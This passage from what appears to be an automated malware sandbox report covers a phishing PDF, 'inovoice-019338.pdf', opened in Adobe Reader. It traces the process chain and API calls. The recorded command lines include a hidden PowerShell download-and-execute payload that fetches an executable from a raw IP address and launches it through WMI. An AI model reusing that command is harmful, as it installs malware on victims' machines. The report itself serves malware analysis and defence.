Commandline:'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3816.0.959207006 --type=renderer --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a
Imagebase:0x1290000
File size:1544928 bytes
MD5 hash:513659580A49DF6A85CDFD869895924A
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: AcroRd32.exe PID: 3876 Parent PID: 3204

General

Start time:11:20:23
Start date:26/07/2018
Path:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\inovoice-019338.pdf'
Imagebase:0x1290000
File size:1544928 bytes
MD5 hash:513659580A49DF6A85CDFD869895924A
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: AcroRd32.exe PID: 3924 Parent PID: 3876

General

Start time:11:20:24
Start date:26/07/2018
Path:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3876.0.283852601 --type=renderer 'C:\Users\user\Desktop\inovoice-019338.pdf'
Imagebase:0x1290000
File size:1544928 bytes
MD5 hash:513659580A49DF6A85CDFD869895924A
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: scmwrap.exe PID: 2552 Parent PID: 3876

General

Start time:11:21:01
Start date:26/07/2018
Path:C:\Windows\System32\scmwrap.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\system32\scmwrap.exe' 'C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms'
Imagebase:0x860000
File size:20480 bytes
MD5 hash:5040C4CA9EE4965AD0BA8DAEE98A1885
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:low

Chronological Activities

Analysis Process: cmd.exe PID: 2068 Parent PID: 2552

General

Start time:11:21:05
Start date:26/07/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Imagebase:0x49e40000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: powershell.exe PID: 2108 Parent PID: 2068

General

Start time:11:21:06
Start date:26/07/2018
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Imagebase:0x227c0000
File size:452608 bytes
MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: AcroRd32.exe PID: 3860 Parent PID: 3816

    Execution Graph

    Execution Coverage:15.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:100%
    Total number of Nodes:11
    Total number of Limit Nodes:0

    Graph

    Callgraph

    Executed Functions

    Function 003D8000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13filenative

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 3d8000-3d801c NtCreateFile
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D8110, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4filenative

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 3 3d8110-3d811c NtSetInformationFile
    APIs
    • NtSetInformationFile.NTDLL ref: 003D811A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D8210, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 5 3d8210-3d821c NtOpenKey
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D8310, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 8 3d8310-3d831c NtCreateSection
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D8090, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4filenative

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2 3d8090-3d809c NtQueryAttributesFile
    APIs
    • NtQueryAttributesFile.NTDLL ref: 003D809A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D8690, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 10 3d8690-3d869c NtMapViewOfSection
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D8350, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 9 3d8350-3d835c NtOpenSection
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D8250, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 6 3d8250-3d825c NtOpenKeyEx
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D8050, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4filenative

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1 3d8050-3d805c NtOpenFile
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D81D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 4 3d81d0-3d81dc NtCreateKey
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd
    Function 003D82D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 7 3d82d0-3d82dc NtCreateMutant
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd

    Non-executed Functions

    Analysis Process: AcroRd32.exe PID: 3924 Parent PID: 3876

    Execution Graph

    Execution Coverage:15.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:100%
    Total number of Nodes:11
    Total number of Limit Nodes:0

    Graph

    Callgraph

    Executed Functions

    Function 00725000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13filenative

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 725000-72501c NtCreateFile
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 00725350, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 9 725350-72535c NtOpenSection
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 00725250, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 6 725250-72525c NtOpenKeyEx
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 00725050, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4filenative

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1 725050-72505c NtOpenFile
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 007251D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 4 7251d0-7251dc NtCreateKey
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 007252D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 7 7252d0-7252dc NtCreateMutant
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 00725110, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4filenative

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 3 725110-72511c NtSetInformationFile
    APIs
    • NtSetInformationFile.NTDLL ref: 0072511A
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 00725210, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 5 725210-72521c NtOpenKey
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 00725310, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 8 725310-72531c NtCreateSection
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 00725090, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4filenative

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2 725090-72509c NtQueryAttributesFile
    APIs
    • NtQueryAttributesFile.NTDLL ref: 0072509A
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd
    Function 00725690, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 10 725690-72569c NtMapViewOfSection
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd

    Non-executed Functions